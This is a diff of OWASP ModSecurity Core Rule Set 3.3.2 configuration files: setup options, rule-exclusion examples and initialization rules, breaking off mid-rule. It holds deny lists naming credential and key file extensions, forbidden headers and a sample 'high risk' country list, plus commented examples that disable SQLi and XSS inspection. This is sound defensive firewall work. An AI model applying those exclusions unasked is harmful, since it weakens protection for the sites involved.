# Guards against unintended exposure of development/configuration files.
# Default: .asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/
# Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/
# Uncomment this rule to change the default.
#SecAction \
# "id:900240,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'"
# Forbidden request headers.
# Header names should be lowercase, enclosed by /slashes/ as delimiters.
# Blocking Proxy header prevents 'httpoxy' vulnerability: https://httpoxy.org
# Default: /proxy/ /lock-token/ /content-range/ /if/
# Uncomment this rule to change the default.
#SecAction \
# "id:900250,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:'tx.restricted_headers=/proxy/ /lock-token/ /content-range/ /if/'"
# File extensions considered static files.
# Extensions include the dot, lowercase, enclosed by /slashes/ as delimiters.
# Used in DoS protection rule. See section "Anti-Automation / DoS Protection".
# Default: /.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/
# Uncomment this rule to change the default.
#SecAction \
# "id:900260,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'"
# Content-Types charsets that a client is allowed to send in a request.
# Default: utf-8|iso-8859-1|iso-8859-15|windows-1252
# Uncomment this rule to change the default.
# Use "|" to separate multiple charsets like in the rule defining
# tx.allowed_request_content_type.
#SecAction \
# "id:900280,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'"
#
# -- [[ HTTP Argument/Upload Limits ]] -----------------------------------------
#
# Here you can define optional limits on HTTP get/post parameters and uploads.
# This can help to prevent application specific DoS attacks.
#
# These values are checked in REQUEST-920-PROTOCOL-ENFORCEMENT.conf.
# Beware of blocking legitimate traffic when enabling these limits.
#
# Block request if number of arguments is too high
# Default: unlimited
# Example: 255
# Uncomment this rule to set a limit.
#SecAction \
# "id:900300,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.max_num_args=255"
# Block request if the length of any argument name is too high
# Default: unlimited
# Example: 100
# Uncomment this rule to set a limit.
#SecAction \
# "id:900310,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.arg_name_length=100"
# Block request if the length of any argument value is too high
# Default: unlimited
# Example: 400
# Uncomment this rule to set a limit.
#SecAction \
# "id:900320,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.arg_length=400"
# Block request if the total length of all combined arguments is too high
# Default: unlimited
# Example: 64000
# Uncomment this rule to set a limit.
#SecAction \
# "id:900330,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.total_arg_length=64000"
# Block request if the file size of any individual uploaded file is too high
# Default: unlimited
# Example: 1048576
# Uncomment this rule to set a limit.
#SecAction \
# "id:900340,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.max_file_size=1048576"
# Block request if the total size of all combined uploaded files is too high
# Default: unlimited
# Example: 1048576
# Uncomment this rule to set a limit.
#SecAction \
# "id:900350,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.combined_file_sizes=1048576"
#
# -- [[ Easing In / Sampling Percentage ]] -------------------------------------
#
# Adding the Core Rule Set to an existing productive site can lead to false
# positives, unexpected performance issues and other undesired side effects.
#
# It can be beneficial to test the water first by enabling the CRS for a
# limited number of requests only and then, when you have solved the issues (if
# any) and you have confidence in the setup, to raise the ratio of requests
# being sent into the ruleset.
#
# Adjust the percentage of requests that are funnelled into the Core Rules by
# setting TX.sampling_percentage below. The default is 100, meaning that every
# request gets checked by the CRS. The selection of requests, which are going
# to be checked, is based on a pseudo random number generated by ModSecurity.
#
# If a request is allowed to pass without being checked by the CRS, there is no
# entry in the audit log (for performance reasons), but an error log entry is
# written. If you want to disable the error log entry, then issue the
# following directive somewhere after the inclusion of the CRS
# (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf).
#
# SecRuleUpdateActionById 901150 "nolog"
#
# ATTENTION: If this TX.sampling_percentage is below 100, then some of the
# requests will bypass the Core Rules completely and you lose the ability to
# protect your service with ModSecurity.
#
# Uncomment this rule to enable this feature:
#
#SecAction "id:900400,\
# phase:1,\
# pass,\
# nolog,\
# setvar:tx.sampling_percentage=100"
#
# -- [[ Project Honey Pot HTTP Blacklist ]] ------------------------------------
#
# Optionally, you can check the client IP address against the Project Honey Pot
# HTTPBL (dnsbl.httpbl.org). In order to use this, you need to register to get a
# free API key. Set it here with SecHttpBlKey.
#
# Project Honeypot returns multiple different malicious IP types.
# You may specify which you want to block by enabling or disabling them below.
#
# Ref: https://www.projecthoneypot.org/httpbl.php
# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey
#
# Uncomment these rules to use this feature:
#
#SecHttpBlKey XXXXXXXXXXXXXXXXX
#SecAction "id:900500,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.block_search_ip=1,\
# setvar:tx.block_suspicious_ip=1,\
# setvar:tx.block_harvester_ip=1,\
# setvar:tx.block_spammer_ip=1"
#
# -- [[ GeoIP Database ]] ------------------------------------------------------
#
# There are some rulesets that inspect geolocation data of the client IP address
# (geoLookup). The CRS uses geoLookup to implement optional country blocking.
#
# To use geolocation, we make use of the MaxMind GeoIP database.
# This database is not included with the CRS and must be downloaded.
#
# There are two formats for the GeoIP database. ModSecurity v2 uses GeoLite (.dat files),
# and ModSecurity v3 uses GeoLite2 (.mmdb files).
#
# If you use ModSecurity 3, MaxMind provides a binary for updating GeoLite2 files,
# see https://github.com/maxmind/geoipupdate.
#
# Download the package for your OS, and read https://dev.maxmind.com/geoip/geoipupdate/
# for configuration options.
#
# Warning: GeoLite (not GeoLite2) databases are considered legacy, and not being updated anymore.
# See https://support.maxmind.com/geolite-legacy-discontinuation-notice/ for more info.
#
# Therefore, if you use ModSecurity v2, you need to regenerate updated .dat files
# from CSV files first.
#
# You can achieve this using https://github.com/sherpya/geolite2legacy
# Pick the zip files from maxmind site:
# https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country-CSV.zip
#
# Follow the guidelines for installing the tool and run:
# ./geolite2legacy.py -i GeoLite2-Country-CSV.zip \
# -f geoname2fips.csv -o /usr/share/GeoliteCountry.dat
#
# Update the database regularly, see Step 3 of the configuration link above.
#
# By default, when you execute `sudo geoipupdate` on Linux, files from the free database
# will be downloaded to `/usr/share/GeoIP` (both v1 and v2).
#
# Then choose from:
# - `GeoLite2-Country.mmdb` (if you are using ModSecurity v3)
# - `GeoLiteCountry.dat` (if you are using ModSecurity v2)
#
# Ref: http://blog.spiderlabs.com/2010/10/detecting-malice-with-modsecurity-geolocation-data.html
# Ref: http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html
#
# Uncomment only one of the next rules here to use this feature.
# Choose the one depending on the ModSecurity version you are using, and change the path accordingly:
#
# For ModSecurity v3:
#SecGeoLookupDB /usr/share/GeoIP/GeoLite2-Country.mmdb
# For ModSecurity v2 (points to the converted one):
#SecGeoLookupDB /usr/share/GeoIP/GeoLiteCountry.dat
#
# -=[ Block Countries ]=-
#
# Rules in the IP Reputation file can check the client against a list of high
# risk country codes. These countries have to be defined in the variable
# tx.high_risk_country_codes via their ISO 3166 two-letter country code:
# https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2#Officially_assigned_code_elements
#
# If you are sure that you are not getting any legitimate requests from a given
# country, then you can disable all access from that country via this variable.
# The rule performing the test has the rule id 910100.
#
# This rule requires SecGeoLookupDB to be enabled and the GeoIP database to be
# downloaded (see the section "GeoIP Database" above.)
#
# By default, the list is empty. A list used by some sites was the following:
# setvar:'tx.high_risk_country_codes=UA ID YU LT EG RO BG TR RU PK MY CN'"
#
# Uncomment this rule to use this feature:
#
#SecAction \
# "id:900600,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:'tx.high_risk_country_codes='"
#
# -- [[ Anti-Automation / DoS Protection ]] ------------------------------------
#
# Optional DoS protection against clients making requests too quickly.
#
# When a client is making more than 100 requests (excluding static files) within
# 60 seconds, this is considered a 'burst'. After two bursts, the client is
# blocked for 600 seconds.
#
# Requests to static files are not counted towards DoS; they are listed in the
# 'tx.static_extensions' setting, which you can change in this file (see
# section "HTTP Policy Settings").
#
# For a detailed description, see rule file REQUEST-912-DOS-PROTECTION.conf.
#
# Uncomment this rule to use this feature:
#
#SecAction \
# "id:900700,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:'tx.dos_burst_time_slice=60',\
# setvar:'tx.dos_counter_threshold=100',\
# setvar:'tx.dos_block_timeout=600'"
#
# -- [[ Check UTF-8 encoding ]] ------------------------------------------------
#
# The CRS can optionally check request contents for invalid UTF-8 encoding.
# We only want to apply this check if UTF-8 encoding is actually used by the
# site; otherwise it will result in false positives.
#
# Uncomment this rule to use this feature:
#
#SecAction \
# "id:900950,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.crs_validate_utf8_encoding=1"
#
# -- [[ Blocking Based on IP Reputation ]] ------------------------------------
#
# Blocking based on reputation is permanent in the CRS. Unlike other rules,
# which look at the individual request, the blocking of IPs is based on
# a persistent record in the IP collection, which remains active for a
# certain amount of time.
#
# There are two ways an individual client can become flagged for blocking:
# - External information (RBL, GeoIP, etc.)
# - Internal information (Core Rules)
#
# The record in the IP collection carries a flag, which tags requests from
# individual clients with a flag named IP.reput_block_flag.
# But the flag alone is not enough to have a client blocked. There is also
# a global switch named tx.do_reput_block. This is off by default. If you set
# it to 1 (=On), requests from clients with the IP.reput_block_flag will
# be blocked for a certain duration.
#
# Variables
# ip.reput_block_flag Blocking flag for the IP collection record
# ip.reput_block_reason Reason (= rule message) that caused to blocking flag
# tx.do_reput_block Switch deciding if we really block based on flag
# tx.reput_block_duration Setting to define the duration of a block
#
# It may be important to know, that all the other core rules are skipped for
# requests, when it is clear that they carry the blocking flag in question.
#
# Uncomment this rule to use this feature:
#
#SecAction \
# "id:900960,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.do_reput_block=1"
#
# Uncomment this rule to change the blocking time:
# Default: 300 (5 minutes)
#
#SecAction \
# "id:900970,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.reput_block_duration=300"
#
# -- [[ Collection timeout ]] --------------------------------------------------
#
# Set the SecCollectionTimeout directive from the ModSecurity default (1 hour)
# to a lower setting which is appropriate to most sites.
# This increases performance by cleaning out stale collection (block) entries.
#
# This value should be greater than or equal to:
# tx.reput_block_duration (see section "Blocking Based on IP Reputation") and
# tx.dos_block_timeout (see section "Anti-Automation / DoS Protection").
#
# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecCollectionTimeout
# Please keep this directive uncommented.
# Default: 600 (10 minutes)
SecCollectionTimeout 600
#
# -- [[ End of setup ]] --------------------------------------------------------
#
# The CRS checks the tx.crs_setup_version variable to ensure that the setup
# has been loaded. If you are not planning to use this setup template,
# you must manually set the tx.crs_setup_version variable before including
# the CRS rules/* files.
#
# The variable is a numerical representation of the CRS version number.
# E.g., v3.0.0 is represented as 300.
#
SecAction \
"id:900990,\
phase:1,\
nolog,\
pass,\
t:none,\
setvar:tx.crs_setup_version=332"

8
core/modsecurity/files/coreruleset/docs/README Normal file
View File

@@ -0,0 +1,8 @@
Welcome to the OWASP Core Rule Set (CRS) documentation.
The OWASP CRS documentation is generated as a Sphinx project and is stored in a separate Github repository. While the documentation is available as part of the CRS project it is provided in the form of a git-submodule. Using a git-submodule allow us to update the documentation without making changes to the main rule repository.
You can download the documentation using git:
$ git submodule init
$ git submodule update
Alternatively, the latest version of the documentation is available at https://www.modsecurity.org/CRS/Documentation/

165
core/modsecurity/files/coreruleset/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example Normal file
View File

@@ -0,0 +1,165 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# The purpose of this file is to hold LOCAL exceptions for your site. The
# types of rules that would go into this file are one where you want to
# short-circuit inspection and allow certain transactions to pass through
# inspection or if you want to alter rules that are applied.
#
# This file is named REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example for a
# very specific reason. Files affixed with the .example extension are designed
# to contain user created/modified data. The '.example'. extension should be
# renamed to end in .conf. The advantage of this is that when OWASP CRS is
# updated, the updates will not overwrite a user generated configuration file.
#
# As a result of this design paradigm users are encouraged NOT to directly
# modify rules. Instead they should use this
# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and the
# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS file to modify OWASP rules using
# methods similar to the examples specified below.
#
# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and
# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS serve different purposes. ModSecurity
# effectively maintains two different context: startup, and per transaction.
# As a rule, directives are processed within the startup context. While they
# can affect the per transaction context they generally remain fixed during the
# execution of ModSecurity.
#
# As a result if one wanted to disable a rule at bootup the SecRuleRemoveById
# directive or one of its siblings would have to be placed AFTER the rule is
# listed, otherwise it will not have knowledge of the rules existence (since
# these rules are read in at the same time). This means that when using
# directives that effect SecRules, these exceptions should be placed AFTER all
# the existing rules. This is why RESPONSE-999-EXCLUSION-RULES-AFTER-CRS is
# designed such that it loads LAST.
#
# Conversely, ModSecurity supports several actions that can change the state of
# the underlying configuration during the per transaction context, this is when
# rules are being processed. Generally, these are accomplished by using the
# 'ctl' action. As these are part of a rule, they will be evaluated in the
# order rules are applied (by physical location, considering phases). As a
# result of this ordering a 'ctl' action should be placed with consideration to
# when it will be executed. This is particularly relevant for the 'ctl' options
# that involve modifying ID's (such as ruleRemoveById). In these cases it is
# important that such rules are placed BEFORE the rule ID they will affect.
# Unlike the setup context, by the time we process rules in the per-transaction
# context, we are already aware of all the rule ID's. It is by this logic that
# we include rules such as this BEFORE all the remaining rules. As a result
# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS is designed to load FIRST.
#
# As a general rule:
# ctl:ruleEngine -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
# ctl:ruleRemoveById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
# ctl:ruleRemoveByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
# ctl:ruleRemoveByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
# ctl:ruleRemoveTargetById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
# ctl:ruleRemoveTargetByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
# ctl:ruleRemoveTargetByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
#
# SecRuleRemoveById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
# SecRuleRemoveByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
# SecRuleRemoveByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
# SecRuleUpdateActionById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
# SecRuleUpdateTargetById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
# SecRuleUpdateTargetByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
# SecRuleUpdateTargetByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
#
#
# What follows are a group of examples that show you how to perform rule
# exclusions.
#
#
# Example Exclusion Rule: Disable inspection for an authorized client
#
# This ruleset allows you to control how ModSecurity will handle traffic
# originating from Authorized Vulnerability Scanning (AVS) sources. See
# related blog post -
# http://blog.spiderlabs.com/2010/12/advanced-topic-of-the-week-handling-authorized-scanning-traffic.html
#
# White-list ASV network block (no blocking or logging of AVS traffic) Update
# IP network block as appropriate for your AVS traffic
#
# ModSec Rule Exclusion: Disable Rule Engine for known ASV IP
# SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" \
# "id:1000,\
# phase:1,\
# pass,\
# nolog,\
# ctl:ruleEngine=Off"
#
#
# Example Exclusion Rule: Removing a specific ARGS parameter from inspection
# for an individual rule
#
# This rule shows how to conditionally exclude the "password"
# parameter for rule 942100 when the REQUEST_URI is /index.php
# ModSecurity Rule Exclusion: 942100 SQL Injection Detected via libinjection
#
# SecRule REQUEST_URI "@beginsWith /index.php" \
# "id:1001,\
# phase:1,\
# pass,\
# nolog,\
# ctl:ruleRemoveTargetById=942100;ARGS:password"
#
#
# Example Exclusion Rule: Removing a specific ARGS parameter from inspection
# for only certain attacks
#
# Attack rules within the CRS are tagged, with tags such as 'attack-lfi',
# 'attack-sqli', 'attack-xss', 'attack-injection-php', et cetera.
#
# ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd
# for all rules tagged attack-sqli
# SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \
# "id:1002,\
# phase:2,\
# pass,\
# nolog,\
# ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:pwd"
#
# Example Exclusion Rule: Removing a specific ARGS parameter from inspection
# for all CRS rules
#
# This rule illustrates that we can use tagging very effectively to whitelist a
# common false positive across an entire ModSecurity instance. This can be done
# because every rule in OWASP_CRS is tagged with OWASP_CRS. This will NOT
# affect custom rules.
#
# ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd
# for all CRS rules
# SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \
# "id:1003,\
# phase:2,\
# pass,\
# nolog,\
# ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd"
#
# Example Exclusion Rule: Removing a range of rules
#
# This rule illustrates that we can remove a rule range via a ctl action.
# This uses the fact, that rules are grouped by topic in rule files covering
# a certain id range.
#
# ModSecurity Rule Exclusion: Disable all SQLi and XSS rules
# SecRule REQUEST_FILENAME "@beginsWith /admin" \
# "id:1004,\
# phase:2,\
# pass,\
# nolog,\
# ctl:ruleRemoveById=941000-942999"
#
#
# The application specific rule exclusion files
# REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf
# REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf
# bring additional examples which can be useful then tuning a service.

452
core/modsecurity/files/coreruleset/rules/REQUEST-901-INITIALIZATION.conf Normal file
View File

@@ -0,0 +1,452 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# This file REQUEST-901-INITIALIZATION.conf initializes the Core Rules
# and performs preparatory actions. It also fixes errors and omissions
# of variable definitions in the file crs-setup.conf.
# The setup.conf can and should be edited by the user, this file
# is part of the CRS installation and should not be altered.
#
#
# -=[ Rules Version ]=-
#
# Rule version data is added to the "Producer" line of Section H of the Audit log:
#
# - Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); OWASP_CRS/3.1.0.
#
# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecComponentSignature
#
SecComponentSignature "OWASP_CRS/3.3.2"
#
# -=[ Default setup values ]=-
#
# The CRS checks the tx.crs_setup_version variable to ensure that the setup
# file is included at the correct time. This detects situations where
# necessary settings are not defined, for instance if the file
# inclusion order is incorrect, or if the user has forgotten to
# include the crs-setup.conf file.
#
# If you are upgrading from an earlier version of the CRS and you are
# getting this error, please make a new copy of the setup template
# crs-setup.conf.example to crs-setup.conf, and re-apply your policy
# changes. There have been many changes in settings syntax from CRS2
# to CRS3, so an old setup file may cause unwanted behavior.
#
# If you are not planning to use the crs-setup.conf template, you must
# manually set the tx.crs_setup_version variable before including
# the CRS rules/* files.
#
# The variable is a numerical representation of the CRS version number.
# E.g., v3.0.0 is represented as 300.
#
SecRule &TX:crs_setup_version "@eq 0" \
"id:901001,\
phase:1,\
deny,\
status:500,\
log,\
auditlog,\
msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL'"
#
# -=[ Default setup values ]=-
#
# Some constructs or individual rules will fail if certain parameters
# are not set in the setup.conf file. The following rules will catch
# these cases and assign sane default values.
#
# Default Inbound Anomaly Threshold Level (rule 900110 in setup.conf)
SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \
"id:901100,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.inbound_anomaly_score_threshold=5'"
# Default Outbound Anomaly Threshold Level (rule 900110 in setup.conf)
SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \
"id:901110,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.outbound_anomaly_score_threshold=4'"
# Default Paranoia Level (rule 900000 in setup.conf)
SecRule &TX:paranoia_level "@eq 0" \
"id:901120,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.paranoia_level=1'"
# Default Executing Paranoia Level (rule 900000 in setup.conf)
SecRule &TX:executing_paranoia_level "@eq 0" \
"id:901125,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.executing_paranoia_level=%{TX.PARANOIA_LEVEL}'"
# Default Sampling Percentage (rule 900400 in setup.conf)
SecRule &TX:sampling_percentage "@eq 0" \
"id:901130,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.sampling_percentage=100'"
# Default Anomaly Scores (rule 900100 in setup.conf)
SecRule &TX:critical_anomaly_score "@eq 0" \
"id:901140,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.critical_anomaly_score=5'"
SecRule &TX:error_anomaly_score "@eq 0" \
"id:901141,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.error_anomaly_score=4'"
SecRule &TX:warning_anomaly_score "@eq 0" \
"id:901142,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.warning_anomaly_score=3'"
SecRule &TX:notice_anomaly_score "@eq 0" \
"id:901143,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.notice_anomaly_score=2'"
# Default do_reput_block
SecRule &TX:do_reput_block "@eq 0" \
"id:901150,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.do_reput_block=0'"
# Default block duration
SecRule &TX:reput_block_duration "@eq 0" \
"id:901152,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.reput_block_duration=300'"
# Default HTTP policy: allowed_methods (rule 900200)
SecRule &TX:allowed_methods "@eq 0" \
"id:901160,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
# Default HTTP policy: allowed_request_content_type (rule 900220)
SecRule &TX:allowed_request_content_type "@eq 0" \
"id:901162,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/x-amf| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json| |application/octet-stream| |application/csp-report| |application/xss-auditor-report| |text/plain|'"
# Default HTTP policy: allowed_request_content_type_charset (rule 900270)
SecRule &TX:allowed_request_content_type_charset "@eq 0" \
"id:901168,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'"
# Default HTTP policy: allowed_http_versions (rule 900230)
SecRule &TX:allowed_http_versions "@eq 0" \
"id:901163,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'"
# Default HTTP policy: restricted_extensions (rule 900240)
SecRule &TX:restricted_extensions "@eq 0" \
"id:901164,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'"
# Default HTTP policy: restricted_headers (rule 900250)
SecRule &TX:restricted_headers "@eq 0" \
"id:901165,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.restricted_headers=/proxy/ /lock-token/ /content-range/ /if/'"
# Default HTTP policy: static_extensions (rule 900260)
SecRule &TX:static_extensions "@eq 0" \
"id:901166,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'"
# Default enforcing of body processor URLENCODED
SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \
"id:901167,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.enforce_bodyproc_urlencoded=0'"
#
# -=[ Initialize internal variables ]=-
#
# Initialize anomaly scoring variables.
# All _score variables start at 0, and are incremented by the various rules
# upon detection of a possible attack.
# sql_error_match is used for shortcutting rules for performance reasons.
SecAction \
"id:901200,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.anomaly_score=0',\
setvar:'tx.anomaly_score_pl1=0',\
setvar:'tx.anomaly_score_pl2=0',\
setvar:'tx.anomaly_score_pl3=0',\
setvar:'tx.anomaly_score_pl4=0',\
setvar:'tx.sql_injection_score=0',\
setvar:'tx.xss_score=0',\
setvar:'tx.rfi_score=0',\
setvar:'tx.lfi_score=0',\
setvar:'tx.rce_score=0',\
setvar:'tx.php_injection_score=0',\
setvar:'tx.http_violation_score=0',\
setvar:'tx.session_fixation_score=0',\
setvar:'tx.inbound_anomaly_score=0',\
setvar:'tx.outbound_anomaly_score=0',\
setvar:'tx.outbound_anomaly_score_pl1=0',\
setvar:'tx.outbound_anomaly_score_pl2=0',\
setvar:'tx.outbound_anomaly_score_pl3=0',\
setvar:'tx.outbound_anomaly_score_pl4=0',\
setvar:'tx.sql_error_match=0'"
#
# -=[ Initialize collections ]=-
#
# Create both Global and IP collections for rules to use.
# There are some CRS rules that assume that these two collections
# have already been initiated.
#
SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \
"id:901318,\
phase:1,\
pass,\
t:none,t:sha1,t:hexEncode,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.ua_hash=%{MATCHED_VAR}'"
SecAction \
"id:901321,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
initcol:global=global,\
initcol:ip=%{remote_addr}_%{tx.ua_hash},\
setvar:'tx.real_ip=%{remote_addr}'"
#
# -=[ Initialize Correct Body Processing ]=-
#
# Force request body variable and optionally request body processor
#
# Force body variable
SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
"id:901340,\
phase:1,\
pass,\
nolog,\
noauditlog,\
msg:'Enabling body inspection',\
tag:'paranoia-level/1',\
ctl:forceRequestBodyVariable=On,\
ver:'OWASP_CRS/3.3.2'"
# Force body processor URLENCODED
SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \
"id:901350,\
phase:1,\
pass,\
t:none,t:urlDecodeUni,\
nolog,\
noauditlog,\
msg:'Enabling forced body inspection for ASCII content',\
